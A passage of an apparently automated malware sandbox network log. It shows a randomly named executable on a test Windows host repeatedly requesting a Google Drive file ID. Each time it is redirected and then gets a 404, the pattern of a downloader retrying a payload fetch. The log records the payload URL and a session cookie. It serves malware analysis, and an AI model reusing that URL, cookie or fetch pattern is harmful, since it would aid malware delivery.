                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:53 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC41J0T9rcwAmomBrR5aj2KfVX_uwSnsubyD5rR_edViruEMXNBweUxlqUOwtQh9uNGp
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:53 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-6q3oQVu49o-Zlobz29u_iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:53 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DcmWB9msyHvEb5DPyem8cA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          10 | 192.168.11.20 | 49756 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:03 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:04 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-LGrvnoOdpWo18uncPgPbrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.11.20 | 49757 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:04 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgS7PyZKIdu5fsvm96mx7w5dvyIfBsgC8eY2aGpW8MzvaqTUz6Leup5ZZjrsgqP1pmE3
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:04 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-fKS1nCBZopWdm8Ixn1kRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g6eNk7sQUWJ0fp-9CriTtQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.11.20 | 49758 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:15 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:15 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-vqoR29EQIZC6QmdJvgsOpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.11.20 | 49759 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:15 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:16 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgSqgw4Xcnoq_mmC0w82Es0CkINiBSNv3gdMKqZSIRhVhWRfYxEfbngKg-jXGBbBOiX8
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:15 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-boktPEdIAOX-cEICFdwjaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ORZ1SpWqX6IiLuF4OK2VUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.11.20 | 49760 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:26 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:26 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-oD9irkpXvSa5dOctwNhrmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.11.20 | 49761 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:26 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:27 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6uIo5some-btXRcOLd22gMLvc_fEF3ARs7EjTXWqi_iJRU6uxBJH79s0pqNvkWtGR1Iv_7ivY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:27 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7A6MlT_rupybLNtKCERIEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:27 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WAeoM1dTBQWpEj32-6qzZw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.11.20 | 49762 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:37 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:37 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QQH2lMTFF70U2mXlE51jqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          17 | 192.168.11.20 | 49763 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:38 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:38 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC647X2r8U-MTu2n4aPvSdUj3TCScGugC88GXg6g6TgO7vQSPHRs5P0o7lRdkqZFrbGkphzD0tY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:38 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-dqRnQ96kB8Cx8gWsNVQXJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
